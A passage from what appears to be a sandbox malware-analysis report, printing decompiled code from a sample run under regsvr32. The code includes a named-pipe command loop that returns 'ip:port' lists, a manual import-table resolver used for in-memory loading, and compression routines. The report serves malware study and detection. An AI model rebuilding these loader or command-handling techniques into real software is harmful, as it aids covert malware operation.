            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
            • String ID:
            • API String ID: 1872726118-0
            • Opcode ID: ab21e88e1c16fba145b4098988e47a53d7becf20e6edd2290c4f2f2c82b5f74a
            • Instruction ID: 547050b62350abd27cb5bea92c5b87b5af49ca8f0fe36c7880b4849dc6d80f69
            • Opcode Fuzzy Hash: ab21e88e1c16fba145b4098988e47a53d7becf20e6edd2290c4f2f2c82b5f74a
            • Instruction Fuzzy Hash: 62E1BF74E14219DFCB14CFA8C880AADBBF5FF4A314F248569E915AB350C774AA81DF90
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: @$\u%04X$\u%04X\u%04X
            • API String ID: 0-2132903582
            • Opcode ID: 56cd2a8acc6bd891eb71f3b6f549370390f9ea9cf647b84f537f41ee06e976d0
            • Instruction ID: 89f7bfe26e84a7782e5b9248efa0a8219d5c4621ba622b967b6e3b63e085591c
            • Opcode Fuzzy Hash: 56cd2a8acc6bd891eb71f3b6f549370390f9ea9cf647b84f537f41ee06e976d0
            • Instruction Fuzzy Hash: B1411A71B0420AABDF244DAC8D9EBBE369CEF43714F280567FD02D6284E265CD90D2E1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E009A33DA(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
            				signed int _t12;
            				signed int _t13;
            				signed int _t23;
            				void* _t30;
            				char* _t31;
            				char* _t33;
            				char* _t35;
            				char* _t37;
            				char* _t38;
            				long long* _t40;
            
            				_t30 = __edi;
            				_t12 = _a20;
            				if(_t12 == 0) {
            					_t12 = 0x11;
            				}
            				_t35 = _a4;
            				_push(_t25);
            				 *_t40 = _a12;
            				_push(_t12);
            				// formats the double _a12 into the _a4 buffer with "%.*g", precision _a20 (17 when unspecified);
            				// the API list identifies L009A3533 as _snprintf
            				_push("%.*g");
            				_push(_a8);
            				_push(_t35);
            				L009A3533();
            				_t23 = _t12;
            				if(_t23 < 0 || _t23 >= _a8) {
            					L16:
            					_t13 = _t12 | 0xffffffff;
            					goto L17;
            				} else {
            					E009A33B3(_t12, _t35);
            					// if the result has neither '.' nor 'e', append ".0" so it still reads as a float
            					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
            						L8:
            						_push(_t30);
            						_t37 = strchr(_t35, 0x65);
            						_t31 = _t37;
            						if(_t37 == 0) {
            							L15:
            							_t13 = _t23;
            							L17:
            							return _t13;
            						}
            						_t38 = _t37 + 1;
            						_t33 = _t31 + 2;
            						if( *_t38 == 0x2d) {
            							_t38 = _t33;
            						}
            						// strip leading zeros from the exponent digits (e.g. "e+05" becomes "e+5")
            						while( *_t33 == 0x30) {
            							_t33 = _t33 + 1;
            						}
            						if(_t33 != _t38) {
            							E00998ECB(_t38, _t33, _t23 - _t33 + _a4);
            							_t23 = _t23 + _t38 - _t33;
            						}
            						goto L15;
            					} else {
            						_t6 = _t23 + 3; // 0x9a1bc5
            						_t12 = _t6;
            						if(_t12 >= _a8) {
            							goto L16;
            						}
            						_t35[_t23] = 0x302e;
            						( &(_t35[2]))[_t23] = 0;
            						_t23 = _t23 + 2;
            						goto L8;
            					}
            				}
            			}

            0x009a33da
            0x009a33dd
            0x009a33e2
            0x009a33e6
            0x009a33e6
            0x009a33ec
            0x009a33f0
            0x009a33f1
            0x009a33f4
            0x009a33f5
            0x009a33fa
            0x009a33fd
            0x009a33fe
            0x009a3403
            0x009a340a
            0x009a3493
            0x009a3493
            0x00000000
            0x009a3415
            0x009a3416
            0x009a3428
            0x009a344e
            0x009a344e
            0x009a3457
            0x009a3459
            0x009a345f
            0x009a348e
            0x009a348e
            0x009a3496
            0x009a3499
            0x009a3499
            0x009a3461
            0x009a3462
            0x009a3468
            0x009a346a
            0x009a346a
            0x009a346f
            0x009a346e
            0x009a346e
            0x009a3476
            0x009a3482
            0x009a348c
            0x009a348c
            0x00000000
            0x009a3438
            0x009a3438
            0x009a3438
            0x009a343e
            0x00000000
            0x00000000
            0x009a3440
            0x009a3446
            0x009a344b
            0x00000000
            0x009a344b
            0x009a3428

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: strchr$_snprintf
            • String ID: %.*g
            • API String ID: 3619936089-952554281
            • Opcode ID: 45dd96d5a27f78c8e1868741482d4ce1447b4f66a884bd0fbc679119480fa4b1
            • Instruction ID: 2168467c2d0a4b18fc01838acd339f501ec52a8bb18f54641144988eaa8df4f3
            • Opcode Fuzzy Hash: 45dd96d5a27f78c8e1868741482d4ce1447b4f66a884bd0fbc679119480fa4b1
            • Instruction Fuzzy Hash: D3213A32A0461527DB225E6DEC86BAB37DC9F4B764F18C165FC4886291EBA4DF4043D1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 62%
            			E00993775(void* __fp0) {
            				signed int _v144;
            				signed int _v152;
            				char _v160;
            				char _v164;
            				char _v168;
            				signed int _v172;
            				char _v176;
            				intOrPtr _v180;
            				signed int _v184;
            				signed int _v188;
            				signed int _v192;
            				signed int _v196;
            				char _v200;
            				signed int _v204;
            				intOrPtr _t72;
            				intOrPtr _t75;
            				signed int _t80;
            				signed int _t81;
            				signed int _t84;
            				signed int _t87;
            				signed int _t88;
            				signed int _t100;
            				void* _t102;
            				void* _t103;
            				unsigned int* _t104;
            				signed int _t110;
            				signed int _t113;
            				void* _t118;
            				intOrPtr _t124;
            				signed int _t127;
            				intOrPtr _t129;
            				intOrPtr _t132;
            				void* _t133;
            				void* _t136;
            				signed int _t145;
            				signed int _t147;
            				signed short* _t148;
            				signed int _t158;
            				intOrPtr* _t182;
            				void* _t186;
            				void* _t187;
            				void* _t188;
            				signed short* _t191;
            				void* _t195;
            				signed int _t198;
            				signed int _t199;
            				signed int _t203;
            				signed int _t204;
            				char _t205;
            				signed int _t207;
            				void* _t209;
            				void* _t215;
            				void* _t222;
            
            				_t222 = __fp0;
            				_t209 = (_t207 & 0xfffffff8) - 0xac;
            				_v144 = 0;
            				_v172 = 0;
            				while(1) {
            					_t72 =  *0x9af8d0; // 0x452f8c0
            					_push(0);
            					_push( *0x9af8b4);
            					_v152 = 0;
            					// call through a resolved-API table slot (+0xe0) with (hPipe, NULL); 0x217 is
            					// ERROR_PIPE_CONNECTED, so this is consistent with ConnectNamedPipe (inferred, not named in the dump)
            					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
            						break;
            					}
            					_push(0);
            					_push( &_v160);
            					_t75 =  *0x9af8d0; // 0x452f8c0
            					_push(0x80000);
            					_push( *0x9af974);
            					_push( *0x9af8b4);
            					// second table slot (+0x90): reads up to 0x80000 bytes from the pipe into the buffer at 0x9af974
            					// and stores the byte count in _v160 (a ReadFile-style call, inferred from the arguments)
            					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
            						GetLastError();
            						goto L56;
            					} else {
            						// first 16-bit word of the received message selects the command; the rest of the function
            						// is a switch on that value, each branch replying via E0099D297
            						_t148 =  *0x9af974; // 0x0
            						_t80 =  *_t148 & 0x0000ffff;
            						_t215 = _t80 - 8;
            						if(_t215 > 0) {
            							_t81 = _t80 - 9;
            							__eflags = _t81;
            							if(_t81 == 0) {
            								E009A09C3( &_v200);
            								L12:
            								_t84 =  &_v200;
            								L13:
            								_push(4);
            								L14:
            								_push(_t84);
            								_push(5);
            								L31:
            								_pop(_t186);
            								E0099D297(_t186);
            								L32:
            								L56:
            								// one client message per iteration; disconnect and loop unless a branch set _v172
            								DisconnectNamedPipe( *0x9af8b4);
            								_push(0);
            								_pop(0);
            								_push(1);
            								_pop(1);
            								if(_v172 == 0) {
            									continue;
            								}
            								break;
            							}
            							_t87 = _t81;
            							__eflags = _t87;
            							if(_t87 == 0) {
            								_v204 = 0;
            								_t88 = E009916B0( &_v204, _t222);
            								_v188 = _t88;
            								__eflags = _t88;
            								if(_t88 == 0) {
            									_push(4);
            									_v192 = 0;
            									_push( &_v192);
            									L19:
            									_push(0xa);
            									goto L31;
            								}
            								_t145 = _v204;
            								_t90 = _t145 * 0x16;
            								_v184 = _t145 * 0x16;
            								_t203 = E00998DC9(_t90);
            								_v192 = _t203;
            								__eflags = _t203;
            								if(_t203 == 0) {
            									_t64 =  &_v192;
            									 *_t64 = _v192 & 0x00000000;
            									__eflags =  *_t64;
            									_push(4);
            									_push( &_v192);
            									_t187 = 0xa;
            									E0099D297(_t187);
            									L52:
            									E00998DDF( &_v188, _t145);
            									goto L32;
            								}
            								_t198 = 0;
            								__eflags = _t145;
            								if(_t145 == 0) {
            									L50:
            									_push(E0099A5D0(_t203));
            									_push(_t203);
            									_t188 = 5;
            									E0099D297(_t188);
            									E00998DDF( &_v192, 0xffffffff);
            									_t209 = _t209 + 0x10;
            									goto L52;
            								}
            								_t158 = _v188 + 4;
            								__eflags = _t158;
            								_v204 = _t158;
            								do {
            									__eflags = _t198;
            									if(_t198 != 0) {
            										__eflags = _t198 - _t145 - 1;
            										if(_t198 < _t145 - 1) {
            											_t102 = E0099A5D0(_t203);
            											_t158 = _v204;
            											 *((short*)(_t102 + _t203)) = 0x3b; // ';' separator between entries
            										}
            									}
            									_t100 =  *_t158;
            									_v196 = _t100;
            									__eflags = _t100;
            									if(_t100 != 0) {
            										_t103 = E0099A5D0(_t203);
            										_t104 = _v204;
            										_push(_t104[1] & 0x0000ffff);
            										_push( *_t104 >> 0x18);
            										_push(_t104[0] & 0x000000ff);
            										_push(_t104[0] & 0x000000ff);
            										_t110 = E0099A5D0(_t203) + _t203;
            										__eflags = _t110;
            										// appends each 0x20-byte record as "ip:port" text to the reply buffer (E0099A5D0 is used as strlen here)
            										E00999FA5(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
            										_t158 = _v204;
            										_t209 = _t209 + 0x20;
            									}
            									_t198 = _t198 + 1;
            									_t158 = _t158 + 0x20;
            									_v204 = _t158;
            									__eflags = _t198 - _t145;
            								} while (_t198 < _t145);
            								goto L50;
            							}
            							__eflags = _t87 != 1;
            							if(_t87 != 1) {
            								goto L56;
            							}
            							_v204 = 0;
            							_t113 = E009916B0( &_v204, _t222);
            							_t204 = _v204;
            							_v196 = _t113;
            							__eflags = _t113;
            							if(_t113 != 0) {
            								E00998DDF( &_v196, _t204);
            							}
            							_v204 = _t204 * 0x16;
            							_t84 =  &_v204;
            							goto L13;
            						}
            						if(_t215 == 0) {
            							_t84 = E009A09C3( &_v200);
            							L16:
            							__eflags = _t84;
            							if(_t84 == 0) {
            								_push(0);
            								_push(0);
            								goto L19;
            							}
            							_push(_v200);
            							goto L14;
            						}
            						_t118 = _t80 - 1;
            						if(_t118 == 0) {
            							_t199 = E00999D29( &(_t148[4]), 0x20, 1,  &_v176);
            							_v196 = _t199;
            							__eflags = _t199;
            							if(_t199 == 0) {
            								L30:
            								_t191 =  *0x9af974; // 0x0
            								E0099A06E( &_v164,  &(_t191[4]), 0x80);
            								_push(0x84);
            								_push( &_v168);
            								_push(2);
            								goto L31;
            							}
            							_t205 = _v176;
            							__eflags = _t205 - 1;
            							if(__eflags <= 0) {
            								_t124 = E00991D97(E0099A102( *_t199, __eflags), 0, 0, 0);
            								_t209 = _t209 + 0x10;
            								_v168 = _t124;
            								goto L30;
            							}
            							_t125 = _t205 - 1;
            							_v184 = _t205 - 1;
            							_t127 = E00998DC9(_t125 << 2);
            							_v188 = _t127;
            							__eflags = _t127;
            							if(_t127 == 0) {
            								goto L30;
            							}
            							_t147 = 1;
            							__eflags = _t205 - 1;
            							if(__eflags <= 0) {
            								L28:
            								_t129 = E00991D97(E0099A102( *_t199, __eflags), _t127, _v184, 0);
            								_t209 = _t209 + 0x10;
            								_v168 = _t129;
            								E00999E22( &_v176);
            								goto L30;
            							}
            							_v204 = _t127;
            							do {
            								_t132 = E00999A76( *((intOrPtr*)(_t199 + _t147 * 4)), E0099A5D0( *((intOrPtr*)(_t199 + _t147 * 4))));
            								_t182 = _v204;
            								_t147 = _t147 + 1;
            								 *_t182 = _t132;
            								_v204 = _t182 + 4;
            								__eflags = _t147 - _t205;
            							} while (__eflags < 0);
            							_t127 = _v188;
            							goto L28;
            						}
            						_t133 = _t118 - 3;
            						if(_t133 == 0) {
            							_push(0);
            							_push(0);
            							_t195 = 5;
            							E0099D297(_t195);
            							// sets a global flag and _v172 so the loop exits after the pipe is disconnected
            							 *0x9af9a8 = 1;
            							_v172 = 1;
            							goto L56;
            						}
            						_t136 = _t133;
            						if(_t136 == 0) {
            							_t84 = E009A09A1( &_v200);
            							goto L16;
            						}
            						if(_t136 != 1) {
            							goto L56;
            						}
            						E009A09A1( &_v200);
            						goto L12;
            					}
            				}
            				return 0;
            			}

            0x00993775
            0x0099377b
            0x00993788
            0x0099378d
            0x00993791
            0x00993791
            0x00993796
            0x00993797
            0x0099379d
            0x009937a9
            0x00000000
            0x00000000
            0x009937bc
            0x009937c1
            0x009937c2
            0x009937c7
            0x009937cc
            0x009937d2
            0x009937e0
            0x00993aec
            0x00000000
            0x009937f1
            0x009937f1
            0x009937f7
            0x009937fa
            0x009937fd
            0x0099396b
            0x0099396b
            0x0099396e
            0x00993ae2
            0x0099382c
            0x0099382d
            0x00993831
            0x00993831
            0x00993833
            0x00993833
            0x00993834
            0x0099394f
            0x0099394f
            0x00993950
            0x00993955
            0x00993af2
            0x00993af8
            0x00993b03
            0x00993b05
            0x00993b06
            0x00993b08
            0x00993b09
            0x00000000
            0x00000000
            0x00000000
            0x00993b09

            APIs
            • GetLastError.KERNEL32 ref: 009937AB
              • Part of subcall function 0099D297: FlushFileBuffers.KERNEL32(00000000,?,00993ABB,00000000,00000004), ref: 0099D2DD
            • DisconnectNamedPipe.KERNEL32 ref: 00993AF8
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
            • String ID: %u.%u.%u.%u:%u
            • API String ID: 465096328-3858738763
            • Opcode ID: 0f3d1dea1d57dbb4ac2a980a8754096f35b4aeae0fcf44b44133152b2904f46f
            • Instruction ID: 6ce747cee5bcd247f0ea31ae332c10038ad5683399a4f4def1a0f0bccba032cd
            • Opcode Fuzzy Hash: 0f3d1dea1d57dbb4ac2a980a8754096f35b4aeae0fcf44b44133152b2904f46f
            • Instruction Fuzzy Hash: 18A1AD72508302AFDB14EF6DD885B2BB7ECEFC5310F14892EF59586181EB34DA058B92
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E009A376C(signed int __eax, void* __ecx, intOrPtr _a4) {
            				intOrPtr* _v8;
            				signed int* _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				signed int _v28;
            				intOrPtr _v32;
            				struct HINSTANCE__* _v36;
            				intOrPtr _v40;
            				signed int _v44;
            				struct HINSTANCE__* _v48;
            				intOrPtr _v52;
            				signed int _v56;
            				intOrPtr _v60;
            				signed int _v64;
            				signed int _t109;
            				signed int _t112;
            				signed int _t115;
            				void* _t163;
            				void* _t167;
            
            				_t167 = __ecx;
            				_v44 = _v44 & 0x00000000;
            				if(_a4 != 0) {
            					_v48 = GetModuleHandleA("kernel32.dll");
            					_v40 = E0099F024(_t167, _v48, "GetProcAddress");
            					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
            					_v32 = _v52;
            					_t109 = 8;
            					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
            						L24:
            						return 0;
            					}
            					_v56 = 0x80000000;
            					_t112 = 8;
            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
            						_v8 = _v8 + 0x14;
            					}
            					_t115 = 8;
            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
            						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
            						if(_v36 != 0) {
            							if( *_v8 == 0) {
            								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
            							} else {
            								_v12 =  *_v8 + _a4;
            							}
            							_v28 = _v28 & 0x00000000;
            							while( *_v12 != 0) {
            								_v24 = _v24 & 0x00000000;
            								_v16 = _v16 & 0x00000000;
            								_v64 = _v64 & 0x00000000;
            								_v20 = _v20 & 0x00000000;
            								if(( *_v12 & _v56) == 0) {
            									_v60 =  *_v12 + _a4;
            									_v20 = _v60 + 2;
            									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
            									_v16 = _v40(_v36, _v20);
            								} else {
            									_v24 =  *_v12;
            									_v20 = _v24 & 0x0000ffff;
            									_v16 = _v40(_v36, _v20);
            								}
            								if(_v24 != _v16) {
            									_v44 = _v44 + 1;
            									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
            										 *_v12 = _v16;
            									} else {
            										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
            									}
            								}
            								_v12 =  &(_v12[1]);
            								_v28 = _v28 + 4;
            							}
            							_v8 = _v8 + 0x14;
            							continue;
            						}
            						_t163 = 0xfffffffd;
            						return _t163;
            					}
            					goto L24;
            				}
            				return __eax | 0xffffffff;
            			}


            APIs
            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 009A3789
            • LoadLibraryA.KERNEL32(00000000), ref: 009A3822
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID: GetProcAddress$kernel32.dll
            • API String ID: 4133054770-1584408056
            • Opcode ID: 445cf8c017b922eaa9ed6701bf72ef30507107003ffee05fe18d1aeac340b5f5
            • Instruction ID: 611a3a753f092126f2a2cb1292f4c6341ff76942530e167bfcd17fab54791215
            • Opcode Fuzzy Hash: 445cf8c017b922eaa9ed6701bf72ef30507107003ffee05fe18d1aeac340b5f5
            • Instruction Fuzzy Hash: 90618D75D00209EFDB00CF98C885BADBBF1FF49315F248599E855AB2A1C374AA80DF90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 99%
            			E009A4160(int _a4, signed int _a8) {
            				int _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				void* __esi;
            				void* _t137;
            				signed int _t141;
            				intOrPtr* _t142;
            				signed int _t145;
            				signed int _t146;
            				intOrPtr _t151;
            				intOrPtr _t161;
            				intOrPtr _t162;
            				intOrPtr _t167;
            				intOrPtr _t170;
            				signed int _t172;
            				intOrPtr _t173;
            				int _t184;
            				intOrPtr _t185;
            				intOrPtr _t188;
            				signed int _t189;
            				void* _t195;
            				int _t202;
            				int _t208;
            				intOrPtr _t217;
            				signed int _t218;
            				int _t219;
            				intOrPtr _t220;
            				signed int _t221;
            				signed int _t222;
            				int _t224;
            				int _t225;
            				signed int _t227;
            				intOrPtr _t228;
            				int _t232;
            				int _t234;
            				signed int _t235;
            				int _t239;
            				void* _t240;
            				int _t245;
            				int _t252;
            				signed int _t253;
            				int _t254;
            				void* _t257;
            				void* _t258;
            				int _t259;
            				intOrPtr _t260;
            				int _t261;
            				signed int _t269;
            				signed int _t271;
            				intOrPtr* _t272;
            				void* _t273;
            
            				_t253 = _a8;
            				_t272 = _a4;
            				_t3 = _t272 + 0xc; // 0x452bf84d
            				_t4 = _t272 + 0x2c; // 0x8df075ff
            				_t228 =  *_t4;
            				_t137 =  *_t3 + 0xfffffffb;
            				_t229 =  <=  ? _t137 : _t228;
            				_v16 =  <=  ? _t137 : _t228;
            				_t269 = 0;
            				_a4 =  *((intOrPtr*)( *_t272 + 4));
            				asm("o16 nop [eax+eax]");
            				while(1) {
            					_t8 = _t272 + 0x16bc; // 0x5d08408b
            					_t141 =  *_t8 + 0x2a >> 3;
            					_v12 = 0xffff;
            					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
            					if(_t217 < _t141) {
            						break;
            					}
            					_t11 = _t272 + 0x6c; // 0x51ec8b55
            					_t12 = _t272 + 0x5c; // 0xee85000
            					_t245 =  *_t11 -  *_t12;
            					_v8 = _t245;
            					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
            					_t247 =  <  ? _t195 : _v12;
            					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
            					if(_t227 >= _v16) {
            						L7:
            						if(_t253 != 4) {
            							L10:
            							_t269 = 0;
            							__eflags = 0;
            						} else {
            							_t285 = _t227 - _t195;
            							if(_t227 != _t195) {
            								goto L10;
            							} else {
            								_t269 = _t253 - 3;
            							}
            						}
            						E009A7180(_t272, _t272, 0, 0, _t269);
            						_t18 = _t272 + 0x14; // 0xc703f045
            						_t19 = _t272 + 8; // 0x8d000040
            						 *( *_t18 +  *_t19 - 4) = _t227;
            						_t22 = _t272 + 0x14; // 0xc703f045
            						_t23 = _t272 + 8; // 0x8d000040
            						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
            						_t26 = _t272 + 0x14; // 0xc703f045
            						_t27 = _t272 + 8; // 0x8d000040
            						 *( *_t26 +  *_t27 - 2) =  !_t227;
            						_t30 = _t272 + 0x14; // 0xc703f045
            						_t31 = _t272 + 8; // 0x8d000040
            						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
            						E009A5EE0(_t285,  *_t272);
            						_t202 = _v8;
            						_t273 = _t273 + 0x14;
            						if(_t202 != 0) {
            							_t208 =  >  ? _t227 : _t202;
            							_v8 = _t208;
            							_t36 = _t272 + 0x38; // 0xf47d8bff
            							_t37 = _t272 + 0x5c; // 0xee85000
            							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
            							_t273 = _t273 + 0xc;
            							_t252 = _v8;
            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
            							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
            							_t227 = _t227 - _t252;
            						}
            						if(_t227 != 0) {
            							E009A6020( *_t272,  *( *_t272 + 0xc), _t227);
            							_t273 = _t273 + 0xc;
            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
            						}
            						_t253 = _a8;
            						if(_t269 == 0) {
            							continue;
            						}
            					} else {
            						if(_t227 != 0 || _t253 == 4) {
            							if(_t253 != 0 && _t227 == _t195) {
            								goto L7;
            							}
            						}
            					}
            					break;
            				}
            				_t142 =  *_t272;
            				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
            				_a4 = _t232;
            				if(_t232 == 0) {
            					_t83 = _t272 + 0x6c; // 0x51ec8b55
            					_t254 =  *_t83;
            				} else {
            					_t59 = _t272 + 0x2c; // 0x8df075ff
            					_t224 =  *_t59;
            					if(_t232 < _t224) {
            						_t65 = _t272 + 0x3c; // 0x830cc483
            						_t66 = _t272 + 0x6c; // 0x51ec8b55
            						_t260 =  *_t66;
            						__eflags =  *_t65 - _t260 - _t232;
            						if( *_t65 - _t260 <= _t232) {
            							_t67 = _t272 + 0x38; // 0xf47d8bff
            							_t261 = _t260 - _t224;
            							 *(_t272 + 0x6c) = _t261;
            							memcpy( *_t67,  *_t67 + _t224, _t261);
            							_t70 = _t272 + 0x16b0; // 0x8508458b
            							_t188 =  *_t70;
            							_t273 = _t273 + 0xc;
            							_t232 = _a4;
            							__eflags = _t188 - 2;
            							if(_t188 < 2) {
            								_t189 = _t188 + 1;
            								__eflags = _t189;
            								 *(_t272 + 0x16b0) = _t189;
            							}
            						}
            						_t73 = _t272 + 0x38; // 0xf47d8bff
            						_t74 = _t272 + 0x6c; // 0x51ec8b55
            						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
            						_t225 = _a4;
            						_t273 = _t273 + 0xc;
            						_t76 = _t272 + 0x6c;
            						 *_t76 =  *(_t272 + 0x6c) + _t225;
            						__eflags =  *_t76;
            						_t78 = _t272 + 0x6c; // 0x51ec8b55
            						_t184 =  *_t78;
            						_t79 = _t272 + 0x2c; // 0x8df075ff
            						_t239 =  *_t79;
            					} else {
            						 *(_t272 + 0x16b0) = 2;
            						_t61 = _t272 + 0x38; // 0xf47d8bff
            						memcpy( *_t61,  *_t142 - _t224, _t224);
            						_t62 = _t272 + 0x2c; // 0x8df075ff
            						_t184 =  *_t62;
            						_t273 = _t273 + 0xc;
            						_t225 = _a4;
            						_t239 = _t184;
            						 *(_t272 + 0x6c) = _t184;
            					}
            					_t254 = _t184;
            					 *(_t272 + 0x5c) = _t184;
            					_t81 = _t272 + 0x16b4; // 0x830a74c0
            					_t185 =  *_t81;
            					_t240 = _t239 - _t185;
            					_t241 =  <=  ? _t225 : _t240;
            					_t242 = ( <=  ? _t225 : _t240) + _t185;
            					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
            				}
            				if( *(_t272 + 0x16c0) < _t254) {
            					 *(_t272 + 0x16c0) = _t254;
            				}
            				if(_t269 == 0) {
            					_t218 = _a8;
            					__eflags = _t218;
            					if(_t218 == 0) {
            						L34:
            						_t89 = _t272 + 0x3c; // 0x830cc483
            						_t219 =  *_t272;
            						_t145 =  *_t89 - _t254 - 1;
            						_a4 =  *_t272;
            						_t234 = _t254;
            						_v16 = _t145;
            						_v8 = _t254;
            						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
            						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
            							_v8 = _t254;
            							_t95 = _t272 + 0x5c; // 0xee85000
            							_a4 = _t219;
            							_t234 = _t254;
            							_t97 = _t272 + 0x2c; // 0x8df075ff
            							__eflags =  *_t95 -  *_t97;
            							if( *_t95 >=  *_t97) {
            								_t98 = _t272 + 0x2c; // 0x8df075ff
            								_t167 =  *_t98;
            								_t259 = _t254 - _t167;
            								_t99 = _t272 + 0x38; // 0xf47d8bff
            								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
            								 *(_t272 + 0x6c) = _t259;
            								memcpy( *_t99, _t167 +  *_t99, _t259);
            								_t103 = _t272 + 0x16b0; // 0x8508458b
            								_t170 =  *_t103;
            								_t273 = _t273 + 0xc;
            								__eflags = _t170 - 2;
            								if(_t170 < 2) {
            									_t172 = _t170 + 1;
            									__eflags = _t172;
            									 *(_t272 + 0x16b0) = _t172;
            								}
            								_t106 = _t272 + 0x2c; // 0x8df075ff
            								_t145 = _v16 +  *_t106;
            								__eflags = _t145;
            								_a4 =  *_t272;
            								_t108 = _t272 + 0x6c; // 0x51ec8b55
            								_t234 =  *_t108;
            								_v8 = _t234;
            							}
            						}
            						_t255 = _a4;
            						_t220 =  *((intOrPtr*)(_a4 + 4));
            						__eflags = _t145 - _t220;
            						_t221 =  <=  ? _t145 : _t220;
            						_t146 = _t221;
            						_a4 = _t221;
            						_t222 = _a8;
            						__eflags = _t146;
            						if(_t146 != 0) {
            							_t114 = _t272 + 0x38; // 0xf47d8bff
            							E009A6020(_t255,  *_t114 + _v8, _t146);
            							_t273 = _t273 + 0xc;
            							_t117 = _t272 + 0x6c;
            							 *_t117 =  *(_t272 + 0x6c) + _a4;
            							__eflags =  *_t117;
            							_t119 = _t272 + 0x6c; // 0x51ec8b55
            							_t234 =  *_t119;
            						}
            						__eflags =  *(_t272 + 0x16c0) - _t234;
            						if( *(_t272 + 0x16c0) < _t234) {
            							 *(_t272 + 0x16c0) = _t234;
            						}
            						_t122 = _t272 + 0x16bc; // 0x5d08408b
            						_t123 = _t272 + 0xc; // 0x452bf84d
            						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
            						__eflags = _t257 - 0xffff;
            						_t258 =  >  ? 0xffff : _t257;
            						_t124 = _t272 + 0x2c; // 0x8df075ff
            						_t151 =  *_t124;
            						_t125 = _t272 + 0x5c; // 0xee85000
            						_t235 = _t234 -  *_t125;
            						__eflags = _t258 - _t151;
            						_t152 =  <=  ? _t258 : _t151;
            						__eflags = _t235 - ( <=  ? _t258 : _t151);
            						if(_t235 >= ( <=  ? _t258 : _t151)) {
            							L49:
            							__eflags = _t235 - _t258;
            							_t154 =  >  ? _t258 : _t235;
            							_a4 =  >  ? _t258 : _t235;
            							__eflags = _t222 - 4;
            							if(_t222 != 4) {
            								L53:
